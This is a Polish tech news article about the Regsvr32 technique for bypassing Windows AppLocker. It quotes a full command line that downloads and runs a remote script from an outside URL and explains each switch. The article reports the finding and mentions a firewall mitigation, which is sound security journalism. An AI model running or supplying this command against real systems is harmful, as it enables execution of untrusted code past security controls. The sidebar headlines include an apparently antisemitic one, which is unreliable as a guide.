Nowe Technologie i Medycyna
Like

Jedną komendą złamiesz Windowsa

24/04/2016
726 Wyświetlenia
0 Komentarze
2 minut czytania
Jedną komendą złamiesz Windowsa

Być może to nie błąd, lecz po prostu niezamierzona funkcjonalność Windowsa. Na pewno jednak odkryte przez Caseya Smitha działanie systemowego narzędzia Regsvr32, przeznaczonego do rejestrowania plików DLL w Rejestrze wzbudzi spore zainteresowanie zarówno wśród cyberprzestępców, jak i np. uczniów w szkołach. Któż się spodziewał, że pozwoli ono całkowicie obejść systemowe zabezpieczenia i uruchamiać w Windowsie dowolne skrypty?

0


AppLocker wykorzystywany jest już od czasów wprowadzenia na rynek Windowsa 7 do blokowania użytkownikom dostępu do niepożądanych skryptów i aplikacji – i do tej pory był skutecznym sposobem na zamknięcie „okienek”. Okazuje się jednak, że Regsvr32 (Microsoft Register Server), będący podpisaną przez Microsoft binarką, domyślnie obecną w systemie, pozwala na pobranie z Sieci i uruchomienie dowolnego kodu w JavaScripcie lub VBScripcie i jego uruchomienie. Kod ten zaś może uruchomić dowolną aplikację w systemie, omijając wszelkie zabezpieczenia Windowsa.

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

W przykładzie podanym przez The Register, który jako pierwszy poinformował o tej ciekawej możliwości, regsvr32 wywoływany jest z czterema przełącznikami. /s wycisza komunikaty, /n nakazuje nie korzystać z komponentu DllRegisterServer, /i przekazuje opcjonalny parametr do funkcji DllInstall (tutaj skrypt, który nakazuje uruchomić konsolę CMD.exe), zaś /u oznacza próbę odrejestrowania obiektu. Widoczna w wywołaniu biblioteka scrobj.dll to Microsoft Script Component Runtime.

Jeśli więc regsvr32 dostanie URL, pod którym znajdować się będzie plik XML z uruchamialnym kodem, to pobierze go po HTTP lub HTTPS i uruchomi, poprzez próbę odrejestrowania pliku DLL. Nie trzeba tu żadnych specjalnych uprawnień, okna są szeroko otwarte dla każdego.

Odkrywca tej „funkcjonalności”, która daje zupełnie nowe możliwości w dziedzinie penetrowania Windowsów, przygotował już cały zbiór skryptów, które można w ten sposób uruchomić. Możecie je znaleźć na „GitHubie” – pomogą sprawdzić, na ile wasze systemy są na to podatne.

Znany ekspert od systemów Microsoftu Alex Ionescu zachwyca się odkryciem. To w końcu wbudowane w system zdalne uruchamianie kodu bez uprawnień administratora, które omija mechanizm białych list, nie pozostawia śladów na dysku, nie dotyka Rejestru i można to wszystko w dodatku schować w zaszyfrowanej sesji HTTPS. Jak do tej pory łatek nie ma. Jedyne co pozostaje administratorom, to zablokować dostęp do Sieci dla regsvr32 na poziomie zapory sieciowej.

Autorstwo: Adam Golański (eimi)
Źródło: DobreProgramy.pl

0
POPRZEDNI ARTYKUŁ
NASTĘPNY ARTYKUŁ
Wiadomosci 3obieg.pl

Napisz do nas jeśli w Twoim otoczeniu dzieje się coś, co wymaga interwencji dziennikarskiej redakcja@3obieg.pl

1314 publikacje
11 komentarze
 

Dodaj komentarz

Neon24 – ruska V kolumna
POLSKA
06 marca, 2022

Neon24 – ruska V kolumna
3
6
Like
OSZUSTWO NA FUNKCJONARIUSZA CBŚ
SPOŁECZEŃSTWO
25 kwietnia, 2020

OSZUSTWO NA FUNKCJONARIUSZA CBŚ
3
1
5
WESTERPLATTE HISTORIA PRAWDZIWA
POLSKA
01 września, 2018

WESTERPLATTE HISTORIA PRAWDZIWA
2
4
10
Wartość sojuszy
POLSKA
31 sierpnia, 2018

Wartość sojuszy
2
4
8
Prawo do grobu
PRAWO
30 sierpnia, 2018

Prawo do grobu
2
5
4
Czy wojna w 1939 roku musiała wybuchnąć?
POLSKA
26 sierpnia, 2018

Czy wojna w 1939 roku musiała wybuchnąć?
2
13
10
ŻYDOWSKO – BANDEROWSKA UKRAINA
POLSKA
22 sierpnia, 2018

ŻYDOWSKO – BANDEROWSKA UKRAINA
2
6
6
Authorization
Registration
*
*
Entry Lost your Password ?
Registration
*
*
*
Signup
Registration
Password generation
Get New Password
343758